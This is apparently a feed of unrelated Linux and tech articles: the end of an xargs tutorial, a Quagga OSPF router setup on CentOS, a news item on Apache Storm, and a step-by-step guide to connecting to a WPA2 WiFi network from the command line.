As mentioned earlier, the first ingredient for the xargs command is a list of files for which the command or script will be run. We can use the find command to identify and list the files that we are interested in. The -name 'file??' option specifies that only files with names beginning with "file" followed by any two characters will be matched within the xargstest directory. This search is recursive by default, which means that the find command will search for matching files within xargstest and all of its sub-directories.
$ find xargstest/ -name 'file??'
xargstest/dir3/file3B
xargstest/dir3/file3A
xargstest/dir1/file1A
xargstest/dir1/file1B
xargstest/dir2/file2B
xargstest/dir2/file2A
We can pipe the results to the sort command to order the filenames sequentially:
$ find xargstest/ -name 'file??' | sort
xargstest/dir1/file1A
xargstest/dir1/file1B
xargstest/dir2/file2A
xargstest/dir2/file2B
xargstest/dir3/file3A
xargstest/dir3/file3B
We now need the second ingredient, which is the command to execute. We use the wc command with the -l option to count the number of newlines in each file (printed at the beginning of each output line):
$ find xargstest/ -name 'file??' | sort | xargs wc -l
  1 xargstest/dir1/file1A
  2 xargstest/dir1/file1B
  3 xargstest/dir2/file2A
  4 xargstest/dir2/file2B
  5 xargstest/dir3/file3A
  6 xargstest/dir3/file3B
 21 total
You'll see that instead of manually running the wc -l command for each of these files, the xargs command allows you to complete this operation in a single step. Tasks that may have previously seemed unmanageable, such as processing hundreds of files individually, can now be performed quite easily.

Scenario 2: Print the first line of specific files

Now that you know the basics of how to use the xargs command, you have the freedom to choose which command you want to execute. Sometimes, you may want to run commands for only a subset of files and ignore others. In this case, you can use the find command with the -name option and the ? globbing character (matches any single character) to select specific files to pipe into the xargs command. For example, if you want to print the first line of all files that end with a "B" character and ignore the files that end with an "A" character, use the following combination of the find, xargs, and head commands (head -n1 will print the first line in a file):
$ find xargstest/ -name 'file?B' | sort | xargs head -n1
==> xargstest/dir1/file1B <==
one

==> xargstest/dir2/file2B <==
one

==> xargstest/dir3/file3B <==
one
You'll see that only the files with names that end with a "B" character were processed, and all files that end with an "A" character were ignored.

Scenario 3: Process each file using a custom script

Finally, you may want to run a custom script (in Bash, Python, or Perl for example) for the files. To do this, simply substitute the name of your custom script in place of the wc and head commands shown previously:
$ find xargstest/ -name 'file??' | xargs myscript.sh
The custom script myscript.sh needs to be written to accept file names as arguments and process them; note that xargs may pass several file names to a single invocation. The above command will then invoke the script for the files found by the find command. A minimal sketch of such a script follows.
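For illustration, here is a minimal sketch of what such a script could look like (the script name and behavior are hypothetical; it simply reports a line count for every file name it receives, looping because xargs may pass several names per invocation):
#!/bin/bash
# Hypothetical helper: print a line count for each file name passed as an argument.
for f in "$@"; do
    echo "Processing $f: $(wc -l < "$f") lines"
done
Make the script executable with chmod +x myscript.sh before using it with xargs.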
Note that the above examples use file names that do not contain spaces. Generally speaking, life in a Linux environment is much more pleasant when using file names without spaces. If you do need to handle file names with spaces, the above commands will not work and should be tweaked to accommodate them. This is accomplished with the -print0 option for the find command (which prints the full file name to stdout, followed by a null character) and the -0 option for the xargs command (which interprets a null character as the end of a string), as shown below:
$ find xargstest/ -name 'file*' -print0 | xargs -0 myscript.sh
Note that the argument for the -name option has been changed to 'file*', which means any file whose name begins with "file", followed by any number of characters, will be matched.

Summary

After reading this tutorial you will understand the capabilities of the xargs command and how you can implement this into your workflow. Soon you'll be spending more time enjoying the efficiency offered by this command, and less time doing repetitive tasks. For more details and additional options you can read the xargs documentation by entering the 'man xargs' command in your terminal.

How to turn your CentOS box into an OSPF router using Quagga

$
0
0
http://xmodulo.com/turn-centos-box-into-ospf-router-quagga.html

Quagga is an open source routing software suite that can be used to turn your Linux box into a fully-fledged router that supports major routing protocols like RIP, OSPF, BGP and IS-IS. It has full provisions for IPv4 and IPv6, and supports route/prefix filtering. Quagga can be a lifesaver when your production router is down and you don't have a spare at your disposal while waiting for a replacement. With proper configuration, Quagga can even be provisioned as a production router.
In this tutorial, we will connect two hypothetical branch office networks (e.g., 192.168.1.0/24 and 172.16.1.0/24) that have a dedicated link between them.

Our CentOS boxes are located at both ends of the dedicated link. The hostnames of the two boxes are set as 'site-A-RTR' and 'site-B-RTR' respectively. IP address details are provided below.
  • Site-A: 192.168.1.0/24
  • Site-B: 172.16.1.0/24
  • Peering between 2 Linux boxes: 10.10.10.0/30
The Quagga package consists of several daemons that work together. In this tutorial, we will focus on setting up the following daemons.
  1. Zebra: a core daemon, responsible for kernel interfaces and static routes.
  2. Ospfd: an IPv4 OSPF daemon.

Install Quagga on CentOS

We start the process by installing Quagga using yum.
# yum install quagga
On CentOS 7, SELinux prevents /usr/sbin/zebra from writing to its configuration directory by default. This SELinux policy interferes with the setup procedure we are going to describe, so we want to disable this policy. For that, either turn off SELinux (which is not recommended), or enable the 'zebra_write_config' boolean as follows. Skip this step if you are using CentOS 6.
# setsebool -P zebra_write_config 1
Without this change, we will see the following error when attempting to save Zebra configuration from inside Quagga's command shell.
Can't open configuration file /etc/quagga/zebra.conf.OS1Uu5.
After Quagga is installed, we configure necessary peering IP addresses, and update OSPF settings. Quagga comes with a command line shell called vtysh. The Quagga commands used inside vtysh are similar to those of major router vendors such as Cisco or Juniper.

Phase 1: Configuring Zebra

We start by creating a Zebra configuration file, and launching Zebra daemon.
# cp /usr/share/doc/quagga-XXXXX/zebra.conf.sample /etc/quagga/zebra.conf
# service zebra start
# chkconfig zebra on
Launch vtysh command shell:
# vtysh
The prompt will be changed to:
site-A-RTR#
which indicates that you are inside vtysh shell.
First, we configure the log file for Zebra. For that, enter the global configuration mode in vtysh by typing:
site-A-RTR# configure terminal
and specify log file location, then exit the mode:
site-A-RTR(config)# log file /var/log/quagga/quagga.log
site-A-RTR(config)# exit
Save configuration permanently:
site-A-RTR# write
Next, we identify available interfaces and configure their IP addresses as necessary.
site-A-RTR# show interface
Interface eth0 is up, line protocol detection is disabled
. . . . .
Interface eth1 is up, line protocol detection is disabled
. . . . .
Configure eth0 parameters:
site-A-RTR# configure terminal
site-A-RTR(config)# interface eth0
site-A-RTR(config-if)# ip address 10.10.10.1/30
site-A-RTR(config-if)# description to-site-B
site-A-RTR(config-if)# no shutdown
Go ahead and configure eth1 parameters:
site-A-RTR(config)# interface eth1
site-A-RTR(config-if)# ip address 192.168.1.1/24
site-A-RTR(config-if)# description to-site-A-LAN
site-A-RTR(config-if)# no shutdown
Now verify configuration:
site-A-RTR(config-if)# do show interface
Interface eth0 is up, line protocol detection is disabled
. . . . .
inet 10.10.10.1/30 broadcast 10.10.10.3
. . . . .
Interface eth1 is up, line protocol detection is disabled
. . . . .
inet 192.168.1.1/24 broadcast 192.168.1.255
. . . . .
site-A-RTR(config-if)# do show interface description
Interface      Status  Protocol  Description
eth0           up      unknown   to-site-B
eth1           up      unknown   to-site-A-LAN
Save configuration permanently, and quit interface configuration mode.
site-A-RTR(config-if)# do write
site-A-RTR(config-if)# exit
site-A-RTR(config)# exit
site-A-RTR#
Quit vtysh shell to come back to Linux shell.
site-A-RTR# exit
Next, enable IP forwarding so that traffic can be forwarded between eth0 and eth1 interfaces.
# echo "net.ipv4.ip_forward = 1">> /etc/sysctl.conf
# sysctl -p /etc/sysctl.conf
Repeat the IP address configuration and the IP forwarding steps on the site-B server as well (a sketch follows).
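For reference, here is a minimal sketch of the mirrored configuration on the site-B server, assuming eth0 faces the peering link and eth1 faces the site-B LAN (adjust interface names to your hardware):
site-B-RTR# configure terminal
site-B-RTR(config)# interface eth0
site-B-RTR(config-if)# ip address 10.10.10.2/30
site-B-RTR(config-if)# description to-site-A
site-B-RTR(config-if)# no shutdown
site-B-RTR(config-if)# exit
site-B-RTR(config)# interface eth1
site-B-RTR(config-if)# ip address 172.16.1.1/24
site-B-RTR(config-if)# description to-site-B-LAN
site-B-RTR(config-if)# no shutdown
site-B-RTR(config-if)# do write
Then, on site-B's Linux shell, enable IP forwarding in the same way:
# echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf
# sysctl -p /etc/sysctl.conf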
If all goes well, you should be able to ping site-B's peering IP 10.10.10.2 from site-A server.
Note that once Zebra daemon has started, any change made with vtysh's command line interface takes effect immediately. There is no need to restart Zebra daemon after configuration change.

Phase 2: Configuring OSPF

We start by creating an OSPF configuration file, and starting the OSPF daemon:
# cp /usr/share/doc/quagga-XXXXX/ospfd.conf.sample /etc/quagga/ospfd.conf
# service ospfd start
# chkconfig ospfd on
Now launch vtysh shell to continue with OSPF configuration:
# vtysh
Enter router configuration mode:
site-A-RTR# configure terminal
site-A-RTR(config)# router ospf
Optionally, set the router-id manually:
site-A-RTR(config-router)# router-id 10.10.10.1
Add the networks that will participate in OSPF:
site-A-RTR(config-router)# network 10.10.10.0/30 area 0
site-A-RTR(config-router)# network 192.168.1.0/24 area 0
Save configuration permanently:
site-A-RTR(config-router)# do write
Repeat the similar OSPF configuration on site-B as well:
site-B-RTR(config-router)# network 10.10.10.0/30 area 0
site-B-RTR(config-router)# network 172.16.1.0/24 area 0
site-B-RTR(config-router)# do write
The OSPF neighbors should come up now. As long as ospfd is running, any OSPF related configuration change made via vtysh shell takes effect immediately without having to restart ospfd.
In the next section, we are going to verify our Quagga setup.

Verification

1. Test with ping

To begin with, you should be able to ping the LAN subnet of site-B from site-A. Make sure that your firewall does not block ping traffic.
[root@site-A-RTR ~]# ping 172.16.1.1 -c 2

2. Check routing tables

Necessary routes should be present in both kernel and Quagga routing tables.
[root@site-A-RTR ~]# ip route
10.10.10.0/30 dev eth0  proto kernel  scope link  src 10.10.10.1
172.16.1.0/30 via 10.10.10.2 dev eth0 proto zebra metric 20
192.168.1.0/24 dev eth1 proto kernel scope link src 192.168.1.1
[root@site-A-RTR ~]# vtysh
site-A-RTR# show ip route
Codes: K - kernel route, C - connected, S - static, R - RIP, O - OSPF,
I - ISIS, B - BGP, > - selected route, * - FIB route

O 10.10.10.0/30 [110/10] is directly connected, eth0, 00:14:29
C>* 10.10.10.0/30 is directly connected, eth0
C>* 127.0.0.0/8 is directly connected, lo
O>* 172.16.1.0/30 [110/20] via 10.10.10.2, eth0, 00:14:14
C>* 192.168.1.0/24 is directly connected, eth1

3. Verifying OSPF neighbors and routes

Inside vtysh shell, you can check if necessary neighbors are up, and proper routes are being learnt.
[root@site-A-RTR ~]# vtysh
site-A-RTR# show ip ospf neighbor

In this tutorial, we focused on configuring basic OSPF using Quagga. In general, Quagga allows us to easily configure a regular Linux box to speak dynamic routing protocols such as OSPF, RIP or BGP. Quagga-enabled boxes will be able to communicate and exchange routes with any other router that you may have in your network. Since it supports major open standard routing protocols, it may be a preferred choice in many scenarios. Better yet, Quagga's command line interface is almost identical to that of major router vendors like Cisco or Juniper, which makes deploying and maintaining Quagga boxes very easy.
Hope this helps.

Apache Storm is ready for prime time

$
0
0
http://www.zdnet.com/apache-storm-is-ready-for-prime-time-7000034162

Summary: Storm, a real-time framework for dealing with Big Data, has become an Apache top level project.

What do you do when you have terabytes and more of data and you want to work it with in real time? Well, one solution is to turn to Apache Storm.
Apache_Storm_logo
Storm is an open-source high-performance, distributed real-time computation framework for processing fast, large streams of data. It can be used for real-time analytics, online machine learning, continuous computation, and other Big Data jobs.
This program is also very fast. The Apache Software Foundation (ASF) claims that Storm is capable of processing more than a million tuples per second per node. Storm does this by streaming data in parallel over a cluster, unlike MapReduce, which processes data in batch jobs.
If you've been waiting for Storm to become an Apache Top-Level Project (TLP) before using it, you don't have that excuse any more. Storm became a TLP on September 29.
Officially blessed or not, Storm, which began at marketing intelligence company BackType before being acquired by Twitter, is already being used by many top companies looking for the fastest speeds for their Big Data projects. These include Alibaba, Twitter, Yahoo, and Groupon.
Typically, Storm is used in conjunction with Hadoop, but it's not limited to that. Microsoft, for example, appears to be on the verge of incorporating Storm into Azure Data Factory.
As Andrew Feng, a distinguished architect at Yahoo, said in a statement, "Today's announcement marks a major milestone in the continued evolution of Storm. We are proud of our continued contributions to Storm that have led to the hardening of security, multi-tenancy support, and increased scalability. Today, Apache Storm is widely adopted at Yahoo for real-time data processing needs including content personalization, advertising, and mobile development. It's thrilling to see the Hadoop ecosystem and community expand with the continued adoption of Storm."
So, if you're looking for an ideal answer for your real-time data processing workloads, you should check out Storm.

Connect to WiFi network from command line in Linux

$
0
0
http://www.blackmoreops.com/2014/09/18/connect-to-wifi-network-from-command-line-in-linux

How many of you have failed to connect to a WiFi network in Linux? Did you bump into issues like the following in different forums, discussion pages, and blogs? I am sure everyone did at some point. The following list shows just the results from page 1 of a Google search for the keywords “Unable to connect to WiFi network in Linux”.
  1. Cannot connect to wifi at home after upgrade to ubuntu 14.04
  2. Arch Linux not connecting to Wifi anymore
  3. I can’t connect to my wifi
  4. Cannot connect to WiFi
  5. Ubuntu 13.04 can detect wi-fi but can’t connect
  6. Unable to connect to wireless network ath9k
  7. Crazy! I can see wireless network but can’t connect
  8. Unable to connect to Wifi Access point in Debian 7
  9. Unable to connect Wireless
I came across this article on Blogspot, and it was one of the best-written guides I’ve ever come across. I am slightly changing that post to accommodate all flavors of Linux releases.
Connect to WiFi network in Linux from command line - blackMORE Ops
The following guide explains how you can connect to a WiFi network in Linux from the command line. It will take you through the steps for connecting to a WPA/WPA2 WiFi network.

WiFi network from command line – Required tools

The following tools are required to connect to a WiFi network in Linux from the command line:
  1. wpa_supplicant
  2. iw
  3. ip
  4. ping
Before we jump into technical jargon, let's quickly go over each item one at a time.

Linux WPA/WPA2/IEEE 802.1X Supplicant

wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). It is suitable for both desktop/laptop computers and embedded systems. Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver.

iw – Linux Wireless

iw is a new nl80211 based CLI configuration utility for wireless devices. It supports all new drivers that have been added to the kernel recently. The old tool iwconfig, which uses the Wireless Extensions interface, is deprecated, and it's strongly recommended to switch to iw and nl80211.

ip – ip program in Linux

ip is used to show / manipulate routing, devices, policy routing and tunnels. It is used for enabling/disabling devices, and it helps you find general networking information. ip was written by Alexey N. Kuznetsov and added in Linux 2.2. Use man ip to see the full help/man page.

ping

Good old ping. For every ping, there shall be a pong... ping-pong, ping-pong, ping-pong... that should explain it.
BTW, man ping helps too.

Step 1: Find available WiFi adapters – WiFi network from command line

This actually helps: you need to know your WiFi device name before you can connect to a WiFi network. So just use the following command to list all the connected WiFi adapters in your Linux machine.
root@kali:~# iw dev
phy#1
    Interface wlan0
        ifindex 4
        type managed
root@kali:~#
Let me explain the output:
This system has one physical WiFi adapter.
  1. Designated name: phy#1
  2. Device names: wlan0
  3. Interface index: 4, usually assigned per connected port (which can be a USB port).
  4. Type: managed. The type specifies the operational mode of the wireless device; managed means the device is a WiFi station or client that connects to an access point.
Connect to WiFi network in Linux from command line - Find WiFi adapters - blackMORE Ops-1

Step 2: Check device status – WiFi network from command line

By this time many of you are wondering why two network devices appear in the screenshots. The reason I am using two is that I would like to show how a connected and a disconnected device look side by side. The next command will show you exactly that.
You can check whether the wireless device is up or not using the following command:
root@kali:~# ip link show wlan0
4: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc mq state DOWN mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff
root@kali:~#

As you can see, one of my interfaces is UP, while the other, wlan0, is in state DOWN.
Look for the word “UP” inside the angle brackets in the first line of the output.
Connect to WiFi network in Linux from command line - Check device status- blackMORE Ops-2

In the above example, wlan0 is not UP. Execute the command in the next step to bring it up.

Step 3: Bring up the WiFi interface – WiFi network from command line

Use the following command to bring up the WiFi interface:
root@kali:~# ip link set wlan0 up

Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix
Connect to WiFi network in Linux from command line - Bring device up - blackMORE Ops-3
If you run the show link command again, you can tell that wlan0 is now UP.
root@kali:~# ip link show wlan0
4: wlan0: mtu 1500 qdisc mq state UP mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff
root@kali:~#

Step 4: Check the connection status – WiFi network from command line

You can check the WiFi network connection status from the command line using the following command:
root@kali:~# iw wlan0 link
Not connected.
root@kali:~#
Connect to WiFi network in Linux from command line - Check device connection - blackMORE Ops-4
The above output shows that you are not connected to any network.

Step 5: Scan to find WiFi Network – WiFi network from command line

Scan to find out what WiFi network(s) are detected
root@kali:~# iw wlan0 scan
BSS 9c:97:26:de:12:37 (on wlan0)
    TSF: 5311608514951 usec (61d, 11:26:48)
    freq: 2462
    beacon interval: 100
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -53.00 dBm
    last seen: 104 ms ago
    Information elements from Probe Response frame:
    SSID: blackMOREOps
    Supported rates: 1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0
    DS Parameter set: channel 11
    ERP: Barker_Preamble_Mode
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
         * Capabilities: 16-PTKSA-RC (0x000c)
    Extended supported rates: 6.0 9.0 12.0 48.0
---- truncated ----

The two important pieces of information from the above are the SSID and the security protocol (WPA/WPA2 vs. WEP). The SSID in the above example is blackMOREOps. The security protocol is RSN, also commonly referred to as WPA2. The security protocol is important because it determines what tool you use to connect to the network.
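If the scan output is long, a quick way to list just the nearby network names and signal strengths is to filter it with grep (a simple convenience, not part of the original guide):
root@kali:~# iw wlan0 scan | egrep "SSID|signal"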
— following image is a sample only —
Connect to WiFi network in Linux from command line - Scan Wifi Network using iw - blackMORE Ops - 5

Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line

Now we will generate a configuration file for wpa_supplicant that contains the pre-shared key (“passphrase“) for the WiFi network.
root@kali:~# wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
abcd1234
root@kali:~#
(where 'abcd1234' was the Network password)
wpa_passphrase takes the SSID as its argument and reads the passphrase from standard input, which means you need to type in the passphrase for the WiFi network blackMOREOps after you run the command.
Connect to WiFi network in Linux from command line - Connect to WPA WPA2 WiFi network - blackMORE Ops - 6

Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix
wpa_passphrase will create the necessary configuration entries based on your input. Each new network will be added as a new entry (it won't replace existing ones) in the configuration file /etc/wpa_supplicant.conf, as shown in the example after the listing below.
root@kali:~# cat /etc/wpa_supplicant.conf 
# reading passphrase from stdin
network={
ssid="blackMOREOps"
#psk="abcd1234"
psk=42e1cbd0f7fbf3824393920ea41ad6cc8528957a80a404b24b5e4461a31c820c
}
root@kali:~#
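For example, if you later want to add a second network, run the same command again with the other SSID (the SSID below is purely illustrative), and a new network={...} block will be appended after the existing one:
root@kali:~# wpa_passphrase OtherSSID >> /etc/wpa_supplicant.conf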

Step 7: Connect to WPA/WPA2 WiFi network – WiFi network from command line

Now that we have the configuration file, we can use it to connect to the WiFi network. We will be using wpa_supplicant to connect. Use the following command
root@kali:~# wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant.conf
ioctl[SIOCSIWENCODEEXT]: Invalid argument
ioctl[SIOCSIWENCODEEXT]: Invalid argument
root@kali:~#
Where:
-B means run wpa_supplicant in the background.
-D specifies the wireless driver; wext is the generic driver (see the note on driver selection after the screenshot below).
-c specifies the path of the configuration file.

Connect to WiFi network in Linux from command line - Connect to WPA WPA2 WiFi network - blackMORE Ops - 7
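The ioctl[SIOCSIWENCODEEXT]: Invalid argument messages shown above are usually harmless with the generic wext driver as long as the connection comes up. If your adapter's driver supports it, you can also try the newer nl80211 backend instead of wext (a sketch; driver support depends on your kernel and wpa_supplicant build):
root@kali:~# wpa_supplicant -B -D nl80211 -i wlan0 -c /etc/wpa_supplicant.conf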

Use the iw command to verify that you are indeed connected to the SSID.
root@kali:~# iw wlan0 link
Connected to 9c:97:00:aa:11:33 (on wlan0)
    SSID: blackMOREOps
    freq: 2412
    RX: 26951 bytes (265 packets)
    TX: 1400 bytes (14 packets)
    signal: -51 dBm
    tx bitrate: 6.5 MBit/s MCS 0

    bss flags:    short-slot-time
    dtim period:    0
    beacon int:    100

Step 8: Get an IP using dhclient – WiFi network from command line

Up to step 7, we’ve spent our time connecting to the WiFi network. Now use dhclient to obtain an IP address via DHCP:
root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~#
You can use the ip or ifconfig command to verify the IP address assigned by DHCP. As shown below, the assigned IP address is 10.0.0.4.
root@kali:~# ip addr show wlan0
4: wlan0: mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff
    inet 10.0.0.4/24 brd 10.0.0.255 scope global wlan0
       valid_lft forever preferred_lft forever
    inet6 fe80::260:64ff:fe37:4a30/64 scope link
       valid_lft forever preferred_lft forever
root@kali:~#

(or)

root@kali:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:60:64:37:4a:30
inet addr:10.0.0.4 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::260:64ff:fe37:4a30/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:23868 errors:0 dropped:0 overruns:0 frame:0
TX packets:23502 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:22999066 (21.9 MiB) TX bytes:5776947 (5.5 MiB)

root@kali:~#
The last configuration step is to make sure that you have the proper routing rules, in particular a default route. Check the routing table; if the default route is missing, you can add it manually as shown after the output below.
root@kali:~# ip route show 
default via 10.0.0.138 dev wlan0
10.0.0.0/24 dev wlan0  proto kernel  scope link  src 10.0.0.4

Connect to WiFi network in Linux from command line - Check Routing and DHCP - blackMORE Ops - 8
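If the default route were missing from the output above, you could add it by hand; the gateway 10.0.0.138 is taken from the routing table shown here and will differ on your network (the same command appears again in the summary):
root@kali:~# ip route add default via 10.0.0.138 dev wlan0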

Step 9: Test connectivity – WiFi network from command line

Ping Google’s public DNS IP to confirm the network connection (or you can just browse the web):
root@kali:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_req=3 ttl=42 time=265 ms
64 bytes from 8.8.8.8: icmp_req=4 ttl=42 time=176 ms
64 bytes from 8.8.8.8: icmp_req=5 ttl=42 time=174 ms
64 bytes from 8.8.8.8: icmp_req=6 ttl=42 time=174 ms
^C
--- 8.8.8.8 ping statistics ---
6 packets transmitted, 4 received, 33% packet loss, time 5020ms
rtt min/avg/max/mdev = 174.353/197.683/265.456/39.134 ms
root@kali:~#

Summary

This is a very detailed and long guide. Here is a short summary of all the things you need to do, in just a few lines:
root@kali:~# iw dev
root@kali:~# ip link set wlan0 up
root@kali:~# iw wlan0 scan
root@kali:~# wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
root@kali:~# wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf
root@kali:~# iw wlan0 link
root@kali:~# dhclient wlan0
root@kali:~# ping 8.8.8.8
(where wlan0 is the WiFi adapter and blackMOREOps is the SSID)
(Add the default route manually, if needed:)
root@kali:~# ip route add default via 10.0.0.138 dev wlan0
At the end of it, you should be able to connect to the WiFi network. Depending on the Linux distro you are using and how things go, your commands might be slightly different. Edit the commands as required to meet your needs.
Thanks for reading.